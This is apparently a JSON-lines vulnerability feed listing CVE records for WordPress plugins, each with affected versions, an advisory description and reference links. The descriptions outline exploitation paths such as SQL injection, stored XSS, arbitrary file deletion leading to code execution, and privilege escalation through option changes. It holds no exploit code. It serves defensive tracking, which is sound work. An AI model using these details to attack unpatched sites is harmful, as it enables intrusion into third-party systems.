{"CVE_ID":"CVE-2024-9022","slug":"poll-wp","versionImpact":"2.3.9","description":"The TS Poll \u2013 Survey, Versus Poll, Image Poll, Video Poll plugin for WordPress is vulnerable to SQL Injection via the \u2018orderby\u2019 parameter in all versions up to, and including, 2.3.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d16363d6-ca4b-4de0-abae-a7b07803e2e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d16363d6-ca4b-4de0-abae-a7b07803e2e3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179414\\\/WordPress-Poll-2.3.6-SQL-Injection.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179414\\\/WordPress-Poll-2.3.6-SQL-Injection.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/capture0x\\\/Poll-Plugin-SQL-Injection-\",\"name\":\"https:\\\/\\\/github.com\\\/capture0x\\\/Poll-Plugin-SQL-Injection-\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/poll-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/poll-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/total-soft.com\\\/wp-poll\\\/\",\"name\":\"https:\\\/\\\/total-soft.com\\\/wp-poll\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10262","slug":"drop-shadow-boxes","versionImpact":"1.7.14","description":"The The Drop Shadow Boxes plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.7.14. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa0a296a-a93f-4c0e-9911-b4f9bdd53fad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa0a296a-a93f-4c0e-9911-b4f9bdd53fad?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drop-shadow-boxes\\\/trunk\\\/dropshadowboxes.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drop-shadow-boxes\\\/trunk\\\/dropshadowboxes.php#L150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drop-shadow-boxes\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/drop-shadow-boxes\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11377","slug":"automate-hub-free-by-sperse-io","versionImpact":"1.7.0","description":"The Automate Hub Free by Sperse.IO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.7.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/c\\\/clickup\\\/clickup.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/c\\\/clickup\\\/clickup.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/e\\\/encharge\\\/encharge.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/e\\\/encharge\\\/encharge.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/g\\\/getgist\\\/getgist.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/g\\\/getgist\\\/getgist.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/g\\\/googlecontact\\\/googlecontact.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/g\\\/googlecontact\\\/googlecontact.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/m\\\/mailchimp\\\/mailchimp.php#L179\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/m\\\/mailchimp\\\/mailchimp.php#L179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/t\\\/teamwork\\\/teamwork.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automate-hub-free-by-sperse-io\\\/tags\\\/1.7.0\\\/apps\\\/t\\\/teamwork\\\/teamwork.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a143eb71-d039-441b-871e-d1c5cefb0529?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a143eb71-d039-441b-871e-d1c5cefb0529?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13097","slug":"wp-finance","versionImpact":"1.3.6","description":"The WP Finance WordPress plugin through 1.3.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d83d7274-55ae-4f35-b65e-6d6e19e36fac\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d83d7274-55ae-4f35-b65e-6d6e19e36fac\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13591","slug":"team-builder-for-wpbakery-page-builder","versionImpact":"1.0","description":"The Team Builder For WPBakery Page Builder(Formerly Visual Composer) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'team-builder-vc' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/includes\\\/style10.php#L2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/includes\\\/style10.php#L2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/plugin.class.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/team-builder-for-wpbakery-page-builder\\\/tags\\\/1.0\\\/plugin.class.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6b1e4d9-03dc-47e8-ab41-ae9c04dc0132?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6b1e4d9-03dc-47e8-ab41-ae9c04dc0132?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3529","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.1.2","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.1.2 via the 'file_url' parameter. This makes it possible for unauthenticated attackers to view potentially sensitive information and download a digital product without paying for it.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/wpsc-shortcodes-related.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.1.2\\\/includes\\\/wpsc-shortcodes-related.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275373\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3275373\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordpress-simple-paypal-shopping-cart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordpress-simple-paypal-shopping-cart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-simple-cart-sell-digital-downloads-2468\",\"name\":\"https:\\\/\\\/www.tipsandtricks-hq.com\\\/ecommerce\\\/wp-simple-cart-sell-digital-downloads-2468\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fecc015-518f-4aab-a17e-17cf4b8cf123?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fecc015-518f-4aab-a17e-17cf4b8cf123?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6797","slug":"dl-robotstxt","versionImpact":"1.2","description":"The DL Robots.txt WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14275493-45fd-470c-958f-feded435f706\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/14275493-45fd-470c-958f-feded435f706\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2932","slug":"jkdevkit","versionImpact":"1.9.4","description":"The JKDEVKIT plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'font_upload_handler' function in all versions up to, and including, 1.9.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). If WooCommerce is enabled, attackers will need Contributor-level access and above.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"http:\\\/\\\/example.com\\\/wp-content\\\/plugins\\\/jkdevkit\\\/inc\\\/modules\\\/fonts_manager.php#L1710\",\"name\":\"http:\\\/\\\/example.com\\\/wp-content\\\/plugins\\\/jkdevkit\\\/inc\\\/modules\\\/fonts_manager.php#L1710\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68679ff9-48a8-4146-a37f-5f844dc86c92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68679ff9-48a8-4146-a37f-5f844dc86c92?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2301","slug":"contact-form-with-a-meeting-scheduler-by-vcita","versionImpact":"4.9.1","description":"The Contact Form Builder by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.9.1. This is due to missing nonce validation on the ls_parse_vcita_callback function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61c39f5f-3b17-4e4d-824e-241159a73400?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61c39f5f-3b17-4e4d-824e-241159a73400?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/trunk\\\/system\\\/parse_vcita_callback.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-form-with-a-meeting-scheduler-by-vcita\\\/trunk\\\/system\\\/parse_vcita_callback.php#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4277","slug":"realia","versionImpact":"1.4.0","description":"The Realia plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.0. This is due to missing nonce validation on the 'process_change_profile_form' function. This makes it possible for unauthenticated attackers to change user email via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/realia\\\/tags\\\/1.4.0\\\/includes\\\/post-types\\\/class-realia-post-type-user.php#L112\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/realia\\\/tags\\\/1.4.0\\\/includes\\\/post-types\\\/class-realia-post-type-user.php#L112\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06f33e18-0bdd-4c56-a8df-fc1969b9ecf8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06f33e18-0bdd-4c56-a8df-fc1969b9ecf8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0590","slug":"microsoft-clarity","versionImpact":"0.9.3","description":"The Microsoft Clarity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the edit_clarity_project_id() function. This makes it possible for unauthenticated attackers to change the project id and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5205","slug":"videojs-html5-player","versionImpact":"1.1.11","description":"The Videojs HTML5 Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's videojs_video shortcode in all versions up to, and including, 1.1.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ffd76a2-6700-4c2a-858d-4c7339a8d09a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ffd76a2-6700-4c2a-858d-4c7339a8d09a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/videojs-html5-player\\\/trunk\\\/videojs-html5-player.php#L258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/videojs-html5-player\\\/trunk\\\/videojs-html5-player.php#L258\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091226\\\/#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3091226\\\/#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/videojs-html5-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/videojs-html5-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6459","slug":"news-element","versionImpact":"1.0.5","description":"The News Element Elementor Blog Magazine WordPress plugin before 1.0.6 is vulnerable to Local File Inclusion via the template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/330359fa-d085-4923-b5a8-c0e2e5267247\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/330359fa-d085-4923-b5a8-c0e2e5267247\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9235","slug":"mapster-wp-maps","versionImpact":"1.5.0","description":"The Mapster WP Maps plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to an insufficient capability check on the mapster_wp_maps_set_option_from_js() function in all versions up to, and including, 1.5.0. This makes it possible for authenticated attackers, with contributor-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b81c2990-68d1-4d45-9724-262ec017caf1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b81c2990-68d1-4d45-9724-262ec017caf1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-mapster-wp-maps\\\/blob\\\/009ff350f7fee0788c6d8a735af03e21b132c983\\\/mapster-wp-maps\\\/admin\\\/api\\\/class-mapster-wordpress-maps-api.php#L12\",\"name\":\"https:\\\/\\\/github.com\\\/WordPressBugBounty\\\/plugins-mapster-wp-maps\\\/blob\\\/009ff350f7fee0788c6d8a735af03e21b132c983\\\/mapster-wp-maps\\\/admin\\\/api\\\/class-mapster-wordpress-maps-api.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapster-wp-maps\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapster-wp-maps\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161051\\\/mapster-wp-maps\\\/tags\\\/1.5.0\\\/admin\\\/api\\\/class-mapster-wordpress-maps-api.php?old=3154048&old_path=mapster-wp-maps%2Ftags%2F1.4.1%2Fadmin%2Fapi%2Fclass-mapster-wordpress-maps-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161051\\\/mapster-wp-maps\\\/tags\\\/1.5.0\\\/admin\\\/api\\\/class-mapster-wordpress-maps-api.php?old=3154048&old_path=mapster-wp-maps%2Ftags%2F1.4.1%2Fadmin%2Fapi%2Fclass-mapster-wordpress-maps-api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173973\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173973\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10147","slug":"steel","versionImpact":"1.3.0","description":"The Steel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's btn shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1ed1ef4-8867-499b-8f73-296280573462?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1ed1ef4-8867-499b-8f73-296280573462?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/steel\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/steel\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11853","slug":"jalbum-bridge","versionImpact":"2.0.15","description":"The jAlbum Bridge plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018ar\u2019 parameter in all versions up to, and including, 2.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jalbum-bridge\\\/tags\\\/2.0.15\\\/jalbum-bridge.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jalbum-bridge\\\/tags\\\/2.0.15\\\/jalbum-bridge.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198794\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198794\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jalbum-bridge\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/jalbum-bridge\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b50c83-7128-4e38-9a5e-0954928ff002?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72b50c83-7128-4e38-9a5e-0954928ff002?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11375","slug":"wc1c-main","versionImpact":"0.23.0","description":"The WC1C plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.23.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc1c-main\\\/tags\\\/0.23.0\\\/views\\\/promo\\\/activation.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wc1c-main\\\/tags\\\/0.23.0\\\/views\\\/promo\\\/activation.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52293a10-4240-4a6b-a05b-33675a4ed6b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52293a10-4240-4a6b-a05b-33675a4ed6b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12696","slug":"picture-gallery","versionImpact":"1.5.22","description":"The Picture Gallery \u2013 Frontend Image Uploads, AJAX Photo List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's videowhisper_picture_upload_guest shortcode in all versions up to, and including, 1.5.22 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224277\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3224277\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/picture-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/picture-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a116c846-72df-4701-893a-744a26b191d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a116c846-72df-4701-893a-744a26b191d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13096","slug":"wp-finance","versionImpact":"1.3.6","description":"The WP Finance WordPress plugin through 1.3.6 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca65c478-30bf-4109-93e0-3aedbf4a8264\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca65c478-30bf-4109-93e0-3aedbf4a8264\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13589","slug":"jma-youtube-playlists-with-schema","versionImpact":"2.6.1","description":"The YouTube Playlists with Schema plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'yt_grid' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jma-youtube-playlists-with-schema\\\/trunk\\\/youtube-playlists-with-schema.php#L557\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jma-youtube-playlists-with-schema\\\/trunk\\\/youtube-playlists-with-schema.php#L557\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29ef6956-aeb7-4a72-9f51-b5c5b05c1425?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29ef6956-aeb7-4a72-9f51-b5c5b05c1425?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
